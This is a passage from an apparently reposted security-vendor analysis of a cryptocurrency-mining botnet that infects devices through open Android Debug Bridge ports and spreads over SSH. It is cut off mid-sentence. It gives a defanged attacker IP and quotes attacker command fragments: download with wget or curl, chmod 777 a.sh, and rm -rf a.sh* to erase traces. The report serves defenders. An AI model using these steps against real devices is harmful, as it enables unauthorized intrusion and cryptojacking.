by Jindrich Karasek
We observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread via SSH. This attack takes advantage of the way open ADB ports don’t have authentication by default, similar to the Satori botnet variant we previously reported. This botnet’s design allows it to spread from the infected host to any system that has had a previous SSH connection with the host.
The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this botnet in 21 different countries, with the highest percentage found in South Korea.
Technical detailsADB ArrivalWe found that the IP address 45[.]67[.]14[.]179 connects to the ADB running device or system then conducts several activities. Figure 1 summarizes the attack’s infection chain.
Figure 1. Infection chain of the attack
The attack starts by using the ADB command shell to change the attacked system’s working directory to “/data/local/tmp”. This is because .tmp files typically have default permission to execute.
The bot then determines the kind of system it has entered and whether the system is a honeypot or not, as indicated by the command “uname –a”.
It then uses wget to download the payload, and curl if wget is not present in the infected system. The bot then issues the command “chmod 777 a.sh” to change the permission settings of the downloaded payload, allowing it to be executed.
Finally, when “a.sh” is executed, it is removed using the command “rm -rf a.sh*” to remove its traces. All these commands can be seen in the ma ..
Support the originator by clicking the read the rest link below.
